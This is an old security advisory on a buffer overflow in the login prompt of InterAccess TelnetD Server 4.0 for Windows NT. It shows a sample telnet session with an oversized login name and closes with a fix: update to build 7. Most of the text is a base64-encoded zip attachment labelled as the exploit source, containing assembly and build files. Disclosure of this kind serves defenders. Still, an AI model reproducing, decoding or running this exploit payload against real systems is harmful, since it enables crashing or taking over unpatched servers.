COMMAND
TelnetD Server
SYSTEMS AFFECTED
InterAccess TelnetD Server 4.0 for Windows NT
PROBLEM
UssrLabs found a local/remote buffer overflow. The code that
handles the login commands in the telnet session has an unchecked
buffer that will allow arbitrary code to be executed if it is
overflowed. Example:
[hellme@die-communitech.net$ telnet example.com
Trying example.com...
Connected to example.com.
Escape character is '^]'.
InterAccess TelnetD Server (30 Day Trial Version)
Release 4.0
Copyright (C) 1994-1999 by Pragma Systems, Inc.
All rights reserved.
This copy will expire on Tue Mar 21 21:55:14 2000
login name: (buffer)
Where [buffer] is aprox. 300 characters. The exploit lags the
machine until 100% cpu time. Mimed source od exploit:
---
Content-Type: application/octet-stream; name="ex_telnd.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="ex_telnd.zip"
Content-MD5: NSoI176O/cy9MnzPY/2igQ==
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
-----
SOLUTION
This was a BUILD 4 issue (which was released June 1998) and we
are now on BUILD 7. The problem can be fixed by updating the
service pack/WinSock or by updating to BUILD 7.